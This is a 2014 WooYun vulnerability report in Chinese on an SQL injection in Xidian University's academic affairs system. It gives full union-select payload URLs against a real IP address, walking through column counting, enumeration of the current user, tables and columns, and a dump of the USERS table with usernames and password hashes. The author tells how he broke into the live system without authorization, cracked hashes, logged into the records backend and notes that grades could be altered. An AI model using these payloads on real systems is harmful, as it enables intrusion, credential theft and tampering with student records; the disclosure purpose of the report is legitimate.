当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-057518

漏洞标题:西安电子科技大学JWC系统Oracle数据库SQL注入

相关厂商:西安电子科技大学

漏洞作者: 疯狂的dabing

提交时间:2014-04-18 12:09

修复时间:2014-06-02 12:10

公开时间:2014-06-02 12:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-18: 细节已通知厂商并且等待厂商处理中
2014-04-18: 厂商已经确认,细节仅向厂商公开
2014-04-28: 细节向核心白帽子及相关领域专家公开
2014-05-08: 细节向普通白帽子公开
2014-05-18: 细节向实习白帽子公开
2014-06-02: 细节向公众公开

简要描述:

典型的Oracle注入漏洞,没有过滤任何信息,非常适合练手。

详细说明:

那年大三,即将裸考密码学。我从花三天时间复习和花三天时间搞掉JWC中选择了后者。
前两天没敢直接搞JWC,因为那个服务器非常不稳定,万一搞挂了就不好玩了。前两天虽然拿了不少权限,但是离JWC还是挺远的。
第三天,孤注一掷,直接开始JWC,然后就找到这个Oracle的SQL注入。
后来虽然是裸考,居然考了八十多,非常满意,这个权限也就没用上。再后来通过邮件和教务处留言的方式反馈过该问题,但未得到回应。
现在学弟学妹们越来越吊,为了防止世界被破坏,为了维护世界的和平,避免学弟学妹把持不住自己走上邪路,于是趁早发到乌云。
典型的Oracle注入漏洞,没有过滤任何信息,非常适合练手。
url= http://202.117.120.37/xdjwWeb/practiceAdmin/graduationDesign/studentSeeA/
和http://202.117.120.37/xdjwWebNew/practiceAdmin/graduationDesign/studentSeeA/
这里包含两个库,后边就用url代替了。
1、测试
http://url/see_A_abstract.jsp?gtIndex=2 order by 51—
字段数目为51,注意后边有两个--。
2、union select
http://url/see_A_abstract.jsp?gtIndex=-1 uNiOn seLeCt null,1,null,3,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,1,null,null,1,null,null,null,null,null,1,null,null,null,1,null,null,null,1,null,null,null,1,null,null,null,1,null,1 from dual--

null.png


dual是oracle系统表,判定为oracle数据库,且有回显,且可是使用union。
这个地方比较坑爹的是,每个字段对应的数据类型必须准确。
比如该是字符的地方,就不能使用数字。
Mysql注入的时候,可以用1,2,3,4的形式很快找到,这个非常蛋疼。
先用51个null填充,再依次替换为数字1,遇到错误就试试字符类型,再遇到错误(可能是遇到了其他奇葩类型的数据)就替换为null。经过一段时间的折腾,最终确定是51-3的位置。
3、查表、查字段、查数据
Oracle跟Mysql和sqlserver一样,都存在一些记录了表和字段信息的系统表。
Oracle的是user_tables表和column_name表。
查用户
http://url/see_A_abstract.jsp?gtIndex=-1 uNiOn seLeCt null,1,sys_context('userenv','current_user'),3,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,1,null,null,1,null,null,null,null,null,1,null,null,null,1,null,null,null,1,null,null,null,1,null,null,null,1,null,1 from dual--

.png


查表
http://url/see_A_abstract.jsp?gtIndex=-1 uNiOn seLeCt null,1,wmsys.wm_concat(table_name),3,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,1,null,null,1,null,null,null,null,null,1,null,null,null,1,null,null,null,1,null,null,null,1,null,null,null,1,null,1 from user_tables--
一百多张表简直是要作死

.png


查字段
http:// url /see_A_abstract.jsp
?gtIndex=-1 uNiOn seLeCt null,1,wmsys.wm_concat(column_name),3,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,1,null,null,1,null,null,null,null,null,1,null,null,null,1,null,null,null,1,null,null,null,1,null,null,null,1,null,1 from cols where table_name='USERS'--

.png


查值
http://url/see_A_abstract.jsp?gtIndex=-1 uNiOn seLeCt null,1,US_NAME||','||US_NO||','||US_PSW,3,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,1,null,null,1,null,null,null,null,null,1,null,null,null,1,null,null,null,1,null,null,null,1,null,null,null,1,null,1 from USERS--
USERS表数据量不大,直接全查了。

wangjf.png


密码MD5,破解登录学籍系统后台。

.png


能改成绩哦少年。
原来这套系统里面还有很多好玩的东西,现在貌似都删光了,可惜啊。

漏洞证明:

http://202.117.120.37/xdjwWeb/practiceAdmin/graduationDesign/studentSeeA/see_A_abstract.jsp?gtIndex=-1 uNiOn seLeCt null,1,US_NAME||','||US_NO||','||US_PSW,3,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,1,null,null,1,null,null,null,null,null,1,null,null,null,1,null,null,null,1,null,null,null,1,null,null,null,1,null,1 from USERS--


2.png


.png

修复方案:

=。=

版权声明:转载请注明来源 疯狂的dabing@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-04-18 16:40

厂商回复:

已通知相关学校处理

最新状态:

暂无